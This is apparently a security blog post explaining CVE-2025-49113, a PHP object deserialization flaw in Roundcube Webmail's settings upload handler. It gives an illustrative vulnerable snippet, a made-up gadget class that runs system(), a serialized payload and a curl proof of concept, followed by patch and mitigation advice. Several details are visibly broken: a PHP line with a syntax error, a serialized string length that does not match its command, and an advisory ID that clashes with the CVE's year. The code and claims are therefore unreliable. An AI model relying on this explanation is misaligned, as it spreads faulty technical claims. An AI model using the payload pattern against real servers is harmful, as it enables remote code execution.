CVE-2025-49113 is a critical vulnerability affecting Roundcube Webmail (before version 1.5.10 and 1.6.x before 1.6.11). If you’re running one of these versions, your email system could be wide open to remote code execution (RCE) attacks—even just from a regular logged-in user.
This post explains what’s going wrong, how attackers can exploit this hole, why it’s dangerous, and what you can do about it (with code snippets and official references).
What’s Going On: The Vulnerability
At the root of this CVE is insecure handling of PHP object deserialization in the upload handler of the settings module:
program/actions/settings/upload.php
When an authenticated user uploads something (like importing account settings), one of the URL parameters – _from – is passed into the script. The script doesn’t validate or sanitize it properly. If this parameter is a specially crafted string, it can trigger PHP’s unserialize function with attacker-controlled data.
This is dangerous, because unserialize can turn crafted strings into live PHP objects, which can trigger code execution through so-called “magic methods” (like __destruct()).
Let’s walk through a simplified flow
// In program/actions/settings/upload.php
if (isset($_GET['_from'])) {
$from_data = $_GET['_from'];
// DANGEROUS: Unserializing user-provided value!
$from = @unserialize($from_data);
// ... uses $from for further logic
}
If a logged-in attacker sends a request like
GET /?_task=settings&_action=upload&_from=<serialized_payload>...
…and provides a _from parameter containing a PHP serialized object, that object gets deserialized. If it’s a gadget chain (object with malicious __destruct or __wakeup, or invokes a class with a risky method), attacker-controlled PHP code runs on the server.
Assume we know there’s a class in your code like
class Vulnerable {
public $cmd;
function __destruct() {
system($this->cmd);
}
}
An attacker crafts a payload
$payload = 'O:10:"Vulnerable":1:{s:3:"cmd";s:8:"id > /tmp/pwned";}'; // Shows Linux user info in /tmp/pwned
$url = "https://victim/roundcube/?_task=settings&_action=upload&_from="; . urlencode($payload);
Whoever visits this URL as a logged-in user (attacker does it themself) executes the command on the server!
Let’s see a minimal exploit with curl, for demo purposes
curl -s -k \
-b "roundcube_sessid=<auth-session-cookie>" \
"https://victim.com/roundcube/?_task=settings&_action=upload&_from=O%3A10%3A%22Vulnerable%22%3A1%3A%7Bs%3A3%3A%22cmd%22%3Bs%3A8%3A%22id%3E%2Ftmp%2Fpwned%22%3B%7D";
(substitute your session cookie and exploit as needed).
For real attacks, a clever payload would use available classes or even third-party libraries (like Guzzle or Monolog), which makes real-world exploitation easier.
References and Fixes
Official announcement from Roundcube:
- https://github.com/roundcube/roundcubemail/releases/tag/1.5.10
- https://github.com/roundcube/roundcubemail/releases/tag/1.6.11
CVE record:
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-49113
Technical breakdown (RedTeam Pentesting):
- https://www.redteam-pentesting.de/advisories/rt-sa-2024-001
If you can’t upgrade immediately
* Block access to /program/actions/settings/upload.php via your web server.
* Filter or restrict the _from parameter.
* Remove any unnecessary PHP classes with dangerous magic methods.
Summary Table
| Impact | Exploitability | CISA Exploit-Chain? |
|------------|----------------------|---------------------|
| RCE | Authenticated Users | YES |
*If you’re running old Roundcube, attackers inside your network could take over your server.*
Conclusion
CVE-2025-49113 is a classic, devastating example of PHP object injection. It’s simple to exploit, needs only an ordinary user account, and can result in a full system compromise.
Protect your Roundcube! Patch, filter, and watch out for unserialize in your codebase.
If your IT doesn’t have a patch plan, show them this post.
Further Reading
- Roundcube Official Changelog
- OWASP: PHP Object Injection
Timeline
Published on: 06/02/2025 05:15:53 UTC
Last modified on: 06/02/2025 18:15:24 UTC